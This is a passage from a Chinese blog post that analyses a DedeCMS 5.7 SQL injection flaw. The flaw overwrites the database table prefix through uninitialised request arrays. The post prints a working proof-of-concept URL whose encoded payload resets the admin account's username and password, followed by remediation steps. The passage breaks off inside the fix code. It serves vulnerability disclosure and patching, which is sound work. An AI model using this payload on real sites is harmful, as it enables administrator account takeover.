Dedecms最新注入漏洞分析及修复方法(2)-木庄网络博客

当前第2页返回上一页

首先看这个if判断，意思是如果开启了mysqli扩展，则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中，所以漏洞利用的前提条件是必须关闭mysqli扩展。

这里跟入dedesql.class.php代码，如图

这里我们传入的arrs1、arrs2两个数组因为还没有被初始化，所以这里$v1、$v2拼接为字符串，如图所示

所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为

admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #

继续跟踪代码执行，

跟入ExecuteNoneQuery2函数，一直跟进SetQuery，如图

这里因为$GLOBALS['cfg_dbprefix']是我们可控的，所以就造成了注入，这里看一下$sql的值，如图所示

因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤，所以这里借助它来注入。执行update成功之后，后台账户为test，密码为admin。

三. 漏洞验证

PoC：

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

验证截图：

四. 漏洞修复

0×01、修改php.ini，确保开启php_mysqli.dll扩展。

0×02、修改/include/dedesql.class.php中的代码，如下所示

require_once(DEDEINC.’/common.func.php’);

//引入数据库类

if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”))

{

//echo $GLOBALS['cfg_mysql_type'];

//exit;

require_once(DEDEINC.’/dedesqli.class.php’);

} else {